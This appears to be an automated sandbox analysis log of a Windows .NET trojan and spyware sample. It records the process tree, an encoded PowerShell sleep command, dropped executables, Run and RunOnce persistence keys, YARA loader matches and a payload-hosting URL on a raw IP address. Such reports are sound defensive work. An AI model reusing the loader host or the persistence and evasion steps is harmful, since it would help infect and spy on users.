                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\note\pdf.exe "C:\Users\user\AppData\Roaming\note\pdf.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\note\pdf.exe "C:\Users\user\AppData\Roaming\note\pdf.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe"
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile created: C:\Users\user\AppData\Roaming\noteJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/16@1/2
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: BPL_1000572_007.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5276
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_01
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: C*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbpL;@"
                  Source: BPL_1000572_007.bat.exe, 0000000D.00000002.572590834.0000000000439000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: @@*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbp
                  Source: BPL_1000572_007.bat.exeString found in binary or memory: Maggopfhjwohttp://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/ d/_CorExeMainmscoree.dll
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: BPL_1000572_007.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: BPL_1000572_007.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: .pdb= source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Core.pdb\ source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.pdbj source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Xml.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Core.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: mscorlib.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.Core.pdb source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.pdb4: source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
                  Source: Binary string: System.ni.pdb source: WER8A92.tmp.dmp.21.dr

                  Data Obfuscation

                  barindex
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: pdf.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: pdf.exe PID: 3536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fireless.exe PID: 1420, type: MEMORYSTR
                  .NET source code contains potential unpacker
                  Source: BPL_1000572_007.bat.exe, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                  Source: Wthdlxoyqvnqsfcfiinf.exe.0.dr, yjyog.cs.Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: pdf.exe.0.dr, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                  Source: 0.0.BPL_1000572_007.bat.exe.5b0000.0.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                  Source: 12.0.Wthdlxoyqvnqsfcfiinf.exe.6d0000.0.unpack, yjyog.cs.Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: fireless.exe.13.dr, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_02752318 pushfd ; iretd
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_02752020 push esp; iretd
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_02752304 push esp; iretd
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeCode function: 0_2_027527BA pushfd ; iretd
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeCode function: 17_2_0301EEC1 push FFFFFF8Bh; iretd
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile created: C:\Users\user\AppData\Roaming\note\pdf.exeJump to dropped file
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeJump to dropped file
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeFile created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeJump to dropped file

                  Boot Survival

                  barindex
                  Creates multiple autostart registry keys
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdfJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingisticJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdfJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdfJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingisticJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingisticJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingisticJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingisticJump to behavior
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
